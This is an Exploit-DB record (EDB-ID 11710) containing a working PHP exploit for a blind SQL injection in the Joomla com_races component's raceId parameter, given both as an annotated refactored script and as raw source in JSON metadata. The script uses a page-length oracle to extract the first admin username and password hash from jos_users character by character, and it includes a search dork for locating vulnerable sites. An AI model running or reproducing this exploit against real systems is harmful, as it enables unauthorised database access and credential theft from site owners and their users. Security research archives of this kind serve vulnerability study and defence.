ID EDB-ID:11710
Type exploitdb
Reporter DevilZ TM
Modified 2010-03-13T00:00:00
Description
Joomla Component com_races Blind SQL Injection Vulnerability. Webapps exploit for php platform
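#!/usr/bin/php
<?php
// Joomla com_races "raceId" blind SQL injection PoC (EDB-ID 11710, DevilZ TM).
//
// Technique: boolean-based blind injection with a content-length oracle.
// The target page is fetched once with an always-true predicate (`and 1=1`)
// and once with an always-false one (`and 1=0`). The percentage size gap
// between those two responses ($t) becomes the threshold used to classify
// every later probe as "predicate true" (page looks like the baseline) or
// "predicate false" (page differs by about $t percent). Characters of the
// first `jos_users` row are then recovered one position at a time with
// `ascii(substring(<column>, pos, 1)) > N` comparisons.
//
// Assumptions baked into the original PoC (kept, but documented):
//   - the table prefix is `jos_` (the stock Joomla 1.x default);
//   - the password column is read as 49 characters, which presumably targets
//     the Joomla 1.5 `md5hash:salt` layout (32 + 1 + 16) -- confirm for the
//     target before trusting the output;
//   - bytes are probed in steps of two over 46..58 and 98..122 (username) or
//     98..102 (password), so '.', '/', digits, ':' and lowercase letters are
//     resolved exactly. By my reading of the probe logic, a byte in 59..97
//     (uppercase, '<'..'`') collapses to 'a', a byte below 46 prints as '-',
//     and a byte above the probed range prints nothing at all.
// The length oracle is only reliable when the true and false pages differ in
// size and the page is otherwise stable between requests; the script now
// aborts when the baseline fetch fails or the two pages are indistinguishable
// instead of emitting garbage.
//
// Usage: php Cristal.php "http://host/index.php?option=com_races&task=result&raceId=272"

ini_set("max_execution_time", 0);

/**
 * Fetch $url and return the response body length in bytes.
 *
 * @throws RuntimeException when the request fails (file_get_contents() returns
 *         false on any transport or HTTP-level error).
 */
function page_length(string $url): int
{
    $body = file_get_contents($url);
    if ($body === false) {
        throw new RuntimeException("request failed: " . $url);
    }
    return strlen($body);
}

/**
 * Oracle: true when the page behind $url differs from the always-true baseline
 * by (roughly) the observed true/false gap, i.e. the injected predicate is false.
 *
 * @param int   $baseline  byte length of the `and 1=1` page
 * @param float $threshold percentage gap between the true and false pages
 *
 * A request that fails is reported as "different" -- the original code reached
 * the same verdict via strlen(false) == 0 -- so a flaky target terminates the
 * character search instead of looping forever.
 */
function predicate_is_false(string $url, int $baseline, float $threshold): bool
{
    try {
        $len = page_length($url);
    } catch (RuntimeException $e) {
        fwrite(STDERR, "\n" . $e->getMessage() . "\n");
        return true;
    }
    return abs(100 - ($len / $baseline * 100)) > $threshold - 1;
}

/**
 * Build the probe URL for `ascii(substring((select $column ...), $pos, 1)) > $n`.
 * `%3E` is the URL-encoded `>`; the rest of the payload is left raw, exactly as
 * the original sent it. `--` terminates the remainder of the vulnerable query.
 */
function probe_url(string $url, string $column, int $pos, int $n): string
{
    return $url . "+and+ascii(substring((select+" . $column
        . "+from+jos_users+limit+0,1)," . $pos . ",1))%3E" . $n . "--";
}

/**
 * Recover one character at 1-based position $pos of the given jos_users column.
 *
 * $candidates are probed in ascending order. The first N for which
 * `ascii(...) > N` is false bounds the byte to {N-1, N}; one extra probe
 * (`> N-1`) picks between the two. Returns '' when no candidate matched
 * (byte above the probed range), mirroring the original's silent skip.
 */
function recover_char(string $url, string $column, int $pos, array $candidates, int $baseline, float $threshold): string
{
    foreach ($candidates as $n) {
        if (!predicate_is_false(probe_url($url, $column, $pos, $n), $baseline, $threshold)) {
            continue; // byte is still above $n, keep climbing
        }
        $isLower = predicate_is_false(probe_url($url, $column, $pos, $n - 1), $baseline, $threshold);
        return chr($isLower ? $n - 1 : $n);
    }
    return '';
}

// Banner kept verbatim from the original.
print_r('
######################################################################
# [x]Dork:inurl:index.php?option=com_races "raceId"
# [x]Joomla com_races (raceId) Blind SQL Injection Exploit
# [x] Usage: Cristal.php "http://url/index.php?option=com_races&task=result&raceId=272
#####################################################################
');

if ($argc <= 1) {
    exit(1);
}

$url = $argv[1];

// Calibrate the oracle: $r is the "true" page size, $w the "false" page size.
try {
    $r = page_length($url . "+and+1=1--");
    echo "\nExploiting:\n";
    $w = page_length($url . "+and+1=0--");
} catch (RuntimeException $e) {
    fwrite(STDERR, "\n" . $e->getMessage() . "\n");
    exit(1);
}
if ($r === 0) {
    // The original divided by $r unguarded; an empty baseline makes the oracle meaningless.
    fwrite(STDERR, "\nbaseline page is empty; cannot calibrate the length oracle\n");
    exit(1);
}
$t = abs(100 - ($w / $r * 100));
if ($t < 1) {
    // With $t < 1 the test `abs(...) > $t - 1` is true for every probe, so every
    // character would read as "false" and the output would be garbage.
    fwrite(STDERR, "\ntrue and false pages have the same size; the target does not look injectable via this oracle\n");
    exit(1);
}

echo "Username: ";
// Find the first position past the end of the username: substring() returns ''
// there and ascii('') is 0, so `!= 0` flips to false. If no terminator is found
// within 30 positions, read all 30 (the original left $count unset and printed
// nothing in that case).
$count = 31;
for ($i = 1; $i <= 30; $i++) {
    $terminatorProbe = $url . "+and+ascii(substring((select+username+from+jos_users+limit+0,1)," . $i . ",1))!=0--";
    if (predicate_is_false($terminatorProbe, $r, $t)) {
        $count = $i;
        break;
    }
}

// Same candidate bytes as the original step-2 loops (46..58, then 98..max).
$userCandidates = array_merge(range(46, 58, 2), range(98, 122, 2));
$passCandidates = array_merge(range(46, 58, 2), range(98, 102, 2));

for ($j = 1; $j < $count; $j++) {
    echo recover_char($url, 'username', $j, $userCandidates, $r, $t);
}

echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
    echo recover_char($url, 'password', $j, $passCandidates, $r, $t);
}
echo "\n";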
{"id": "EDB-ID:11710", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla Component com_races Blind SQL Injection Vulnerability", "description": "Joomla Component com_races Blind SQL Injection Vulnerability. Webapps exploit for php platform", "published": "2010-03-13T00:00:00", "modified": "2010-03-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/11710/", "reporter": "DevilZ TM", "references": [], "cvelist": [], "lastseen": "2016-02-01T14:52:37", "viewCount": 10, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-01T14:52:37", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T14:52:37", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/11710/", "sourceData": "#!/usr/bin/php\r\n<?php\r\nini_set(\"max_execution_time\",0);\r\nprint_r('\r\n######################################################################\r\n# [x]Dork:inurl:index.php?option=com_races \"raceId\"\r\n# [x]Joomla com_races (raceId) Blind SQL Injection Exploit\r\n# [x] Usage: Cristal.php \"http://url/index.php?option=com_races&task=result&raceId=272\r\n#####################################################################\r\n');\r\nif ($argc > 1) {\r\n$url = $argv[1];\r\n$r = strlen(file_get_contents($url.\"+and+1=1--\"));\r\necho \"\\nExploiting:\\n\";\r\n$w = strlen(file_get_contents($url.\"+and+1=0--\"));\r\n$t = abs((100-($w/$r*100)));\r\necho \"Username: \";\r\nfor ($i=1; $i <= 30; $i++) {\r\n$laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$i.\",1))!=0--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $count = $i;\r\n $i = 30;\r\n }\r\n}\r\nfor ($j = 1; $j < $count; $j++) {\r\n for ($i = 46; $i <= 122; $i=$i+2) {\r\n if ($i == 60) {\r\n $i = 98;\r\n }\r\n $laenge = 
strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+username+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n echo chr($i-1);\r\n } else {\r\n echo chr($i);\r\n }\r\n $i = 122;\r\n }\r\n }\r\n}\r\necho \"\\nPassword: \";\r\nfor ($j = 1; $j <= 49; $j++) {\r\n for ($i = 46; $i <= 102; $i=$i+2) {\r\n if ($i == 60) {\r\n $i = 98;\r\n }\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".$i.\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n $laenge = strlen(file_get_contents($url.\"+and+ascii(substring((select+password+from+jos_users+limit+0,1),\".$j.\",1))%3E\".($i-1).\"--\"));\r\n if (abs((100-($laenge/$r*100))) > $t-1) {\r\n echo chr($i-1);\r\n } else {\r\n echo chr($i);\r\n }\r\n $i = 102;\r\n }\r\n }\r\n}\r\n}\r\n?>\r\n\r\n\r\n", "osvdbidlist": []}
{}